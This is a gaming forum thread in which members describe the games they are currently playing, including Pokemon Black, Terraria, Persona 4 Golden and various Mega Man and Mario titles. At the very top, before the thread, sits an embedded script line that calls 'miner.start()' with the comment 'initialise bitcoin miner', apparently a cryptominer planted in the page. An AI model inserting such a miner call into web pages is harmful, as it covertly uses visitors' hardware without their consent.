<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmbx community

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
raekuul
D&C 134:2
First name: Pokota
Pronouns: he/him/his

Re: What games are you playing?

Postby raekuul » 1 month ago

I'm trying to finish Pokemon Black. For whatever reason it's hard for me to stay invested in this game long enough to see it through to the end.
I do streams sometimes
SnoruntPyro played my MaGLX2 level
And now to reveal my rejected names: Darth Vader's Tough Savannah Mansion in Canada's Chapter

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 1 month ago

raekuul wrote: I'm trying to finish Pokemon Black. For whatever reason it's hard for me to stay invested in this game long enough to see it through to the end.
How many Gym badges do you have now?
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

Alice
Pronouns: Girl person

Postby Alice » 1 month ago

Finally beat the Moon Lord on master difficulty on Terraria. It was completely absurd and basically took me and a friend completely cheesing the fight to finally succeed. And I don't feel bad at all because I was really getting tired of getting one-shotted by the boss by a completely unavoidable laser from off-screen that was aimed directly at me. I had an easier time with the Empress of Light fight during the daytime so I could get the Terraprisma from her and that's a fight where getting hit deals like 50,000-60,000 damage. In a game where the max possible HP is 600.

Basically we cheesed it through stacking as much life regen as possible followed by defense, positioning my friend and I in two different spots, then whenever one got close to dying we'd slow down our attacks so the Moon Lord switched targets.

raekuul

Postby raekuul » 1 month ago

jayScribble wrote:
raekuul wrote: I'm trying to finish Pokemon Black. For whatever reason it's hard for me to stay invested in this game long enough to see it through to the end.
How many Gym badges do you have now?
4 badges. I just got across the drawbridge and am currently lost on The Next Route looking for Team PETA grunts that probably aren't even here.
I do streams sometimes
And now to reveal my rejected names: Darth Vader's Tough Savannah Mansion in Canada's Chapter

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 1 month ago

raekuul wrote: 4 badges. I just got across the drawbridge and am currently lost on The Next Route looking for Team PETA grunts that probably aren't even here.
It's been years since I played the 5th Gen games, but I seem to recall that the Plasma Grunts for progress are in the storage/freezer area in the 5th gym town.
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

BurntTenda
defeat four ducks

Postby BurntTenda » 1 month ago

I beat Luxord and Xemnas in the KH3 DLC.
Luxord is okay... He's strange.
I finally unlocked the last two Data fights.

I picked Valkyria Chronicles 4 up again. I got to The Resistance mission which is really difficult.
There's probably just something I'm not seeing.
Something goes here sometime.
Oh yeah, I have a Youtube channel

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 1 month ago

Beat Mega Man X4 as both X and Zero once more. All hearts, sub tanks, ex tank obtained as both and armor obtained as X.

Currently re-doing Castlevania: Symphony of the Night and I'm at 17% map completion. Currently at the Normal Castle.

I'm also at 145 moons in Super Mario Odyssey, at 4-4 in Super Mario Bros: The Lost Levels (saving after every stage because I'm doing the FDS version, I'll try to tone it down once I get better at the game, it's pretty fun) and 51 stars in Super Mario 64. Also S8-2 in Super Mario 3D Land, but I'm not sure if I'll go all the way on that one, it's so hard. I guess I can just grind for lives with a trick and just grind it out.

Lastly, I'm at Burn Daisy in Crusader of Centy.
twitter (spicy at times!) | romhacking twitter (cats!!!) | GitHub | avatar by kuma

who cares:

HatKid
Pronouns: she/her

Postby HatKid » 1 month ago

Symphony of the Night is one of those games that are near-universally praised but I think it's a bit overrated. Like, I have a blast with the normal castle, but the inverted castle is just so boring, what with it being the exact same but upside down. Plus, I don't really like... Finale Toccata, I think it's called and since that plays in like 90% of the inverted castle... Not a great time. At least it isn't like Harmony of Dissonance where it's (almost) the exact same castle but with a different palette.

I haven't been playing too many games lately. I've been spending a lot of my free time drawing and writing, but when I have been video gaming, I've been focusing on a few things.

Final Fantasy III (NES) - It's rather amazing just how well this holds up, especially compared to the other two NES Final Fantasies. Mildly annoying how sometimes you are pretty much forced into certain jobs for certain fights but whatever, it's not a huge deal to me. Last I played, I just did the Sewers in Amur. Wasn't all that hard for Siglud, Shanam, Sain, and Duke. Definitely look forward to playing more, which I can't really say about my ongoing, very slow playthrough of NES FF1.

Saints Row - I had played 2-4 around 4 years ago now and I've had the first one but hardly played it. I decided to change that and I've been focusing on the Vice Kings missions for now. Rather annoying how to play more missions you have to earn respect, but unlike Saints Row 2, the only way to earn respect is to do activities and there are a number of rather unfun ones that understandably are not in later entries. Also, it's quite remarkable in that SR2 is better in literally every way. More customization (which goes away in 3 and 4,) actually good radio stations (The Mix, really), there's actually fine aim, there are other ways to get respect besides activities, and the list goes on. I am glad they repurposed the respect system in 3 and 4.

Fire Emblem Three Houses - I finished the Golden Deer route a few days ago and this game was a pleasant surprise. I did not enjoy Awakening that much, Fates... blegh, Echoes was a remake and not completely new, so my expectations were not too high with this one. I had heard that it was pretty much universally liked so that was a good sign. There are some more minor things that bother me, like how for conversations the background is just a 2D image and a rather poor looking one at that, and some classes being unexpectedly gender-locked, as well as the male gay options being... well, not great. Especially compared to the lesbian options. But, it's something. I'll do the other routes eventually, but not too crazy about having to do the Academy phase again.

Secret of Mana - (Re)playing this through the Collection of Mana on Switch. I like the graphics and music, the story is okay, but I don't like the menus at all. I was spoiled by Trials of Mana long ago and it's not easy for me to go back in this case. One thing I do like though is the ability to equip different weapon types on characters, which is sadly absent from Trials. Even if the boy will probably always use the sword because only he can use the Mana sword.

Whew, had a lot more to say than I though :P

Ashan
The world has become a place

Postby Ashan » 1 month ago

Finally getting around to playing King of Cards. The general gameplay is pretty fun but I just do not care about this card game. Thankfully it seems to be optional. It was a big relief when I got to the final boss of the first world and it was just a normal boss fight and not some advanced card game AI

thatguyif
Pronouns: We Are The 99%

Postby thatguyif » 1 month ago

Started Animal Crossing New Horizon. I'm actually enjoying this game far more than I thought I would. It's nice to sit down for 10 minutes and just muck about on my island. Though I feel like the lack of manuals causes you to miss stuff a lot. It took me over a week to realize I could get iron by hitting rocks with my shovel. Still, it's been good so far...

Also, nearly 9 months after getting it on release day, finally started playing Link's Awakening on the Switch. All the feels, man, all the feels :(
Image Image
Image Image
Image Image

KobaBeach
obscure jrpg enthusiast

Binged Crusader of Centy and beat it today! Really good game, even if the story is somewhat simple. It's a kids game, I guess.

Also beat Super Mario Bros. The Lost Levels (beat 8-4) on the Famicom Disk System and got 81 stars in Super Mario 64.
twitter (spicy at times!) | romhacking twitter (cats!!!) | GitHub | avatar by kuma

who cares:

Ashan

Finished off King of Cards. I liked most of the game but that final boss was really frustrating and not fun. My success seemed to be pretty dependent on RNG, and even then, most of the fight is just it filling the screen with projectiles while swinging its hands around wildly. I didn't even know what was hurting me most of the time. And it makes it really difficult when your primary method of attack is throwing yourself into it.

I'd probably have to play through all the games again to figure out how I'd rank them, but it's probably at the bottom 2 alongside Plague Knight. That's not to say they're bad by any means, they're still a lot of fun, but Shovel and Specter really nailed what I love about these games.

Kinda weird for the Shovel Knight project to be over! That seems to have been all Yacht Club Games was doing for the past 6 years, and it's nuts that I paid $11 for this game several years ago and got all this DLC for free. They could have just created new characters and tweaked a few things in the base Shovel Knight levels to make it work with the new mechanics, but they went all out with writing new stories, all new levels, rethinking the flow of the game, etc. Every DLC was like an entirely new game, I feel like I robbed them by getting so much content for free. So I'm excited to see what they come up with next.

Bean

Postby Bean » 1 month ago

Been playing Phantasy Star Portable 2 since I was in the mood for a PSP game. It's fine, but nothing special, which is exactly what I expected.

KobaBeach
obscure jrpg enthusiast

Made it to the second chapter (The Island Floating in the Sky, though reading the kanji and kana in the title card is really hard because its brown on brown on a grainy picture) of PoPoLoCrois Monogatari. It's in Japanese but I can read a bit. And what I can't read I'm looking up through Jisho's search kanji by radicals function (basically searching Kanji through the parts that compose them), also using DeepL and Rikaichamp to help me comprehend how some stuff is meant to be translated (though not relying on it all the time as I am trying to learn Japanese), for instance I didn't know ように could be "so that", "in order to". It's very fascinating. I am skimming over a bit of dialogue to speed things along though (the game can be dense in terms of dialogue), but I'm getting a good comprehension of the plot thus far.

So far Pietro is heading out to save his mom from the World of Darkness after getting back the Crown of Wisdom, which is the main plot of the game. I've played a bit ahead of the game before (up to Chapter 3), so I know you have to head to Godrif (to get to Canarisia) but I guess you could find out about that from the city folk. I'll talk to some folk tomorrow. Also got two of the souvenirs from Gami Gami City. The Gami Gami-kun is too expensive so I'll leave it for later when I can get better money from elsewhere. I've overleveled a bit in trying to get good armor, the souvenirs and preparing for the difficulties ahead (cutesy game but very hard). I'm like level 11-ish?

As for Wild ARMs 2, I've unlocked Level 2 Magic, gone through Quartly, met Kanon, explored Slayheim Castle,

fought Kanon

, went through Alchemic Plant, fought Antenora and

Brad apparently died

He lives so I'm not too worried

. Puzzles are interesting, even if I'm using a guide. I can appreciate the design. I'm currently heading to the Urartu Station to pick up Noel and head to the Emulator Zone (unrelated to the site of the same name).

As for Super Mario 64, Megami Tensei 2 and Super Mario Odyssey, I haven't touched them today.

who cares:

Ashan

Got back into Witcher 3. I gave the game a shot back in January but only got like 5 hours in before losing interest. I think part of my issue was I put the game on hard difficulty and between that and the introduction of a ton of mechanics I wasn't really familiar with, I got overwhelmed. This time I just kept it on normal difficulty and it's kicking my ass a little less so I can focus on learning how the game works. Within a day I got back to where I finished off last time, and even a bit further.

Apparently I chose the wrong answer when I made a file and it asked if I wanted it to simulate a Witcher 2 save because I ended up in a conversation where some guy was asking me details about my interactions with a bunch of people I've never heard of before, so i was just stating random things about my past. Oh well

KobaBeach
obscure jrpg enthusiast

Started Mega Man X7 today! Beat Soldier Stonekong, Tornado Tonion and Wind Crowrang thus far. Got 60 reploids (went on a small visit to Splash Warfly's stage to power up Axl's shot), one heart tank (I'm saving the rest for X since reploids also give you health ups, don't wanna use Zero), one Sub Tank (health) and the Ex Tank.

Got all the reploids in Stonekong, Tonion and Crowrang's stages too.

Also played a bit of Digital Devil Story: Megami Tensei II again. Fused some demons, defeated Pazuzu, explored Shinjuku's underground city, grinded a bit but then decided fuck it, defeated Mammon, recruited Cerberus after getting the ID Code in Nakano (didn't bother doing the Devil Analyzer sidequest because I wasn't paying attention and I kind of got lost trying to figure out which kid was the lying demon and I couldn't find the answer online at the time, I'll try to go through it tomorrow though just for the sake of it), beat the Kourakuen tournament and got the Sun Pillar, went through the trial in Taishidou, beating Vritra and getting the Venus Pillar and now I've been v*red by Zaritan, gotta find the Saturn Pillar.

who cares:

BurntTenda
defeat four ducks

Postby BurntTenda » 1 month ago

I beat all the Data Organization in KH3.
It was great fun.
Very difficult.
Something goes here sometime.
Oh yeah, I have a Youtube channel

KobaBeach
obscure jrpg enthusiast

Had no internet this afternoon so I played some Sonic the Hedgehog again and got all emeralds without needing help in Specials 4&5! Also beat the game of course.

Started Altered Beast and I'm currently trying to get through Stage 4 (Weretiger stage, I assume it's Neff's Temple?). I've learned the gator baby's pattern more or less but carelessness keeps striking me down.

who cares:

HatKid

Postby HatKid » 1 month ago

I got to Case 3 in Ace Attorney: Spirit of Justice. I haven't really been liking this game too much. Nayuta is a very boring prosecutor, the music is bland/reused from previous games, the name puns are extremely lazy, but I'm glad that at least

Blackquill comes back, as he was a highlight of the otherwise meh Dual Destinies

. Plus, I don't think the

eventual "Apollo's childhood' revelation was necessary. Like, cool, but who cares? Plus, it could also be read as a retcon of a detail from AA4, but w/e

In Saints Row, either I finished all the Vice Kings missions I can do at the moment or I'm blind. In any event, I started doing Westside Rollerz missions. Also, the subtitles needed someone to proofread them. Full of wrong "you're"s and lacking apostrophes for possessives, it's more minor stuff sure, but it certainly leaves a less than favorable impression. The game has its fair share of silly bugs, like when I was doing a mission, my car blew up right as a cutscene was starting, which should have killed me and did kill

Benjamin King

, but the game continued onward. It just skipped over any lines he should have had and when I did the last objective the mission abruptly ended. Oops. When I did the first Rollerz mission, for some reason the truck I was supposed to take just could not move. It was on totally flat road but I'd press the accelerate button and it just sat there. I'm not sure what happened there, I restarted and it worked properly.

I started Shin Megami Tensei: Devil Summoner: Soul Hackers on 3DS. I had played a little of Devil Summoner 1 port on PSP with a translation guide on LPArchive, but I didn't get very far. Soul Hackers is quite fun! The dungeon graphics are very similar to Persona 1 (which is welcome! I like P1 :) ) and the portraits remind me of Persona 2. SH is from around then so it makes sense.

Bean

Postby Bean » 1 month ago

Beat Phantasy Star Portable 2. The game had a train level that was not fun, so that automatically means it was below average at best since there has never been an average game or better with a bad train level. Yep. It was close though (C- in my book), so good work almost proving that one wrong. Seriously though, don't do a bomb protection mission with enemies that don't really care if you're slashing or shooting at them. Final boss was also a thing, and too many bosses and late-game enemies could quickly chain hits on you to end a good run. That got a little tiring.

Still, it was okay. Just wouldn't go out of my way to recommend it to anyone, even as a holdover game.

NastCF

Postby NastCF » 1 month ago

I beat the Wily Tower mode in Wily Wars ages ago and never really commented on it. It's fine. I like the idea of remixing different elements of the three games but they never got very clever with their setups. Some segments are pretty much lifted as is from the original games. I liked the inclusion of alternate paths in some of the levels, since it added a bit of replayability, and some of the bosses were pretty interesting.

My casual Sonic Adventure 2 replay eventually evolved into a 100% completion playthrough, and it went surprisingly smooth. The hunting and mech stages were a bit of a struggle, but nothing too painful. My favorite part was probably exploring the stages and discovering things I'd never seen before. Final Rush in particular has so many cool shortcuts I never knew about.

Really the worst offender to me was the mandatory Chao stuff - I don't mind making intermittent visits to the garden inbetween stages, but by the time I'd A-ranked everything my Chao was still not good enough to clear all the races. I ended up using the infinite animal glitch to get that over with.

KobaBeach
obscure jrpg enthusiast

Postby KobaBeach » 3 weeks ago

Played some more Popolocrois Monogatari a few days back. Made it through Godrif and Canarisia and wound up in the Godrif Mines. Rescued Naguro, then grinded a bit to get the Lil' Gami Gami, Daruma, Bear Ornament and Maneki Neko souvenirs (already had the Pennant and Lantern). Made it to Pasela and bought a Member's Card for the Black Market. Will grind to upgrade my gear tomorrow.

Started Rockman 2 Claw, a Mega Man 2 hack by Tsukikuro- around the same day? Beat Quick Man, Bubble Man and Heat Man. Might do Flash Man next. SaGa Frontier 2 music, yo.

Started Croc: Legend of the Gobbos yesterday and I made it to stage 2-5 today. The level design feels kinda bland so far and the bosses are pretty effortless, plus the controls and camera are just jank (it was in development pre-Mario 64 I believe, but came out after), so... It's a respected game on the PSX but, I dunno, I'm not jiving with it as much as a lot of people, but it's not a bad game. A few of the five gem room bonus challenges for the final Gobbo are pretty challenging I'll give it that.

I also beat Altered Beast today. I got to Stage 5 (Golden Werewolf, the Underworld) a few days back but I put it in the backburner because tired. The stage is pretty tough! But I pulled through :) I was on my last life too, I got kinda lucky!

Also played a bit of Sonic Adventure 2 on Steam, until Hidden Base. Leveled up my Neutral Hero chao a bit too. No races beat yet.

who cares:

Alice
Pronouns: Girl person

Postby Alice » 3 weeks ago

Been playing Persona 4 Golden since it randomly lead on Steam recently. I'd only played the base Persona 4 before and ts is a huge improvement. They overhauled things quite a lot with some good quality of life improvements. I especially like the overhaul of the lucky draw system which has a lot more depth and Marie being able to sell you duplicates of skill cards you've obtained is per useful for creating well-rounded personas. (As is the fact that skill inheritance works differently and lets you choose what skills to inherit.)

They still seem to have the really irritating "protagonist getting KOed means instant game over" bullshit that the previous games had though. There's no logical reason for that being as any other character can be KOed just fine and revived. It was really irritating during the first optional boss fight since up until I got the Ares persona and had some great luck with his counter ability activating (a 10% chance) the boss would be guaranteed to ll everyone in my party except Chie during a full party-targeting multihit attack that dealt 150 damage per hit to my party of 140-220hp characters.

Edit: Waht the hell happened to this post? There were somehow entire words missing which I'm pretty sure wasn't the case when I submitted the post.
Last edited by Alice on 19 Jun 2020, 02:13, edited 1 time in total.

raekuul

Postby raekuul » 3 weeks ago

yeah the megaten series in general (and persona in particular) expect you to have mastered the battle system and fusion before you fight your first boss.

good luck with that.

(I'm looking forward to being able to pick skills directly instead of having to rely on chance inheritance - I want my repel-everything-Kartikeya back, dammit!)

As for the "Leader KO means Game Over" part - I grew up with Baldur's Gate. I find it annoying but not a deal-breaker.
I do streams sometimes

HatKid

Postby HatKid » 3 weeks ago

I've always thought such a mechanic made no sense in Persona. Like, why can't anyone use a Revival Bead or something? Are they that dependent on the protagonist's orders that they cease to function when he dies? For what's it's worth anyway, Persona 1 and 2 don't have that mechanic thankfully; P1 and Eternal Punishment would be much more unfair otherwise. Since Innocent Sin is like the easiest game on the planet it wouldn't matter for that one. It makes a little more sense in mainline because there's often only one human in the party and the rest are demons that are summoned from your COMP so if you get KOd they'd go away.

Doesn't make it any less annoying though.

I played Tales of Berseria again atfter not touching it for a while. Battles are still as boring as ever, but at least I feel comfortable auto-battling them unlike when I played Vesperia. The game is very firmly "it's okay" with only ranking slightly higher than Vesperia. I haven't beaten it yet so that opinion could change, but I kind of doubt it. Music is typical bland, forgettable Tales of series stuff, so yeah.

Return to “the cartridgé”